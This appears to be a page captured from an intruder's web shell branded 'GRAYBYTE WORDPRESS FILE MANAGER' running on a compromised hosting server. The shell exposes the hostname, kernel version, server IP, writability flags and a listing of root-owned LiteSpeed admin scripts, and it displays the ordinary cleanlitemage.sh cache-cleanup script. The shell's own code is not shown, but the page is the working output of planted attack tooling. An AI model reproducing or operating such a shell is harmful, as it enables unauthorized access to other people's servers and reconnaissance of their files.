✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium290.web-hosting.com ​🇻​♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.105
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /usr/local/lsws/admin/misc//cleanlitemage.sh
#!/bin/sh

#if [ -f '/usr/bin/ionice' ]; then
#    echo "ionice:" `ionice` 1>&2
#fi 

clean_cache_dir()
{
    for subdir in '0' '1' '2' '3' '4' '5' '6' '7' '8' '9' 'a' 'b' 'c' 'd' 'e' 'f'
    do
        find "$1/$subdir" -type f -mmin +$2 -delete 2>/dev/null
        if [ $? -ne 0 ]; then
            find "$1/$subdir" -type f -mmin +$2 2>/dev/null | xargs rm -f
        fi 
        
        # clean directory
        find "$1/$subdir" -empty -delete 2>/dev/null
        if [ $? -ne 0 ]; then
            find "$1/$subdir" -empty 2>/dev/null | xargs rm -rf
        fi
    #fi
    done

}


if [ "x$1" = 'x' ]; then
echo "Usage:"
echo "   cleanlitemage.sh [-priv <age_mins>] [-pub <age_mins>] <litemage_cache_dir> ... "
echo ""
echo "Note:"
echo "   private cache max_age default is 60 minutes."
echo "   private cache max_age must be > 0 if set."
echo "   public cache max_age default is 0 minutes, meaning public cache will not be purged."
echo "   public cache max_age must be > 10 if set."
echo "   <litemage_cache_dir> is the root directory of LiteMage cache storage"
echo "      and should contain the 'priv' directory."
echo "      multiple cache root directories can be added." 
exit 1
fi

CUR_DIR=`dirname "$0"`
cd $CUR_DIR
CUR_DIR=`pwd`

private_mins=60
public_mins=0

if [ "x$1" == "x-priv" ]; then
    shift
    if [ "$1" -eq "$1" ] 2>/dev/null
    then
        echo "private max age is $1" 1>/dev/null
    else  
        echo "'-priv' must be followed by max_age for private cache in minutes."
        exit 1
    fi
    private_mins=$1
    shift
fi

if [ "x$1" == "x-pub" ]; then
    shift
    if [ "$1" -eq "$1" ] 2>/dev/null
    then
        echo "public max age is $1" 1>/dev/null
    else
        echo "'-pub' must be followed by max_age for public cache in minutes."
        exit 1
    fi
    public_mins=$1
    shift
fi

if [ "x$1" = 'x' ]; then
    echo "ERROR: no cache root directory provided."
    exit 1    
fi


while [ $# -gt 0 ]
do
    root_dir=$1
    shift
    if [ ! -d "$root_dir" ]; then
        echo "ERROR: $root_dir directory does not exists."    
        continue 
    fi
    if [ $public_mins -gt 10 ]; then
        clean_cache_dir "$root_dir" $public_mins
    fi

    if [ $private_mins -gt 0 ]; then
        if [ ! -d "$root_dir/priv" ]; then
            echo "NOTICE: '$root_dir/priv' directory does not exist, skip."
            continue
        fi
        clean_cache_dir "$root_dir/priv" $private_mins
    fi
done



Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
15 May 2026 7.57 PM
root / root
0755
admpass.sh
1.166 KB
15 May 2026 7.57 PM
root / root
0555
ap_lsws.sh
1.821 KB
28 Jun 2026 2.14 PM
root / root
0755
ap_lsws.sh.in
1.823 KB
15 May 2026 7.57 PM
root / root
0555
awstats_install.sh
2.056 KB
15 May 2026 7.57 PM
root / root
0555
build_ap_wrapper.sh
0.609 KB
15 May 2026 7.57 PM
root / root
0555
chroot.sh
7.307 KB
15 May 2026 7.57 PM
root / root
0555
cleancache.sh
1.462 KB
15 May 2026 7.57 PM
root / root
0555
cleanlitemage.sh
2.398 KB
15 May 2026 7.57 PM
root / root
0555
cp_switch_ws.sh
22.958 KB
15 May 2026 7.57 PM
root / root
0555
cpanel_restart_httpd.in
0.715 KB
15 May 2026 7.57 PM
root / root
0555
create_admin_keypair.sh
0.328 KB
15 May 2026 7.57 PM
root / root
0555
enable_ruby_python_selector.sh
2.681 KB
15 May 2026 7.57 PM
root / root
0555
fix_cagefs.sh
0.748 KB
15 May 2026 7.57 PM
root / root
0555
fp_install.sh
1.647 KB
15 May 2026 7.57 PM
root / root
0555
gdb-bt
0.024 KB
15 May 2026 7.57 PM
root / root
0644
genjCryptionKeyPair.php
6.429 KB
15 May 2026 7.57 PM
root / root
0644
gzipStatic.sh
0.266 KB
15 May 2026 7.57 PM
root / root
0555
htpasswd.php
0.101 KB
15 May 2026 7.57 PM
root / root
0644
lscmctl
16.054 KB
19 Jun 2026 6.27 AM
root / root
0775
lshttpd.service
0.659 KB
15 May 2026 7.57 PM
root / root
0555
lsup.sh
5.652 KB
15 May 2026 7.57 PM
root / root
0555
lsup6.sh
5.652 KB
15 May 2026 7.57 PM
root / root
0555
lsws.rc
1.783 KB
15 May 2026 7.57 PM
root / root
0555
lsws.rc.gentoo
0.431 KB
15 May 2026 7.57 PM
root / root
0555
mgr_ver.sh
1.932 KB
15 May 2026 7.57 PM
root / root
0555
php.ini
37.108 KB
15 May 2026 7.57 PM
root / root
0644
purge_cache_by_url
3.228 KB
15 May 2026 7.57 PM
root / root
0555
rc-inst.sh
6.244 KB
15 May 2026 7.57 PM
root / root
0555
rc-uninst.sh
4.611 KB
15 May 2026 7.57 PM
root / root
0555
uninstall.sh
2.899 KB
15 May 2026 7.57 PM
root / root
0555
update.sh
1.846 KB
15 May 2026 7.57 PM
root / root
0555

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF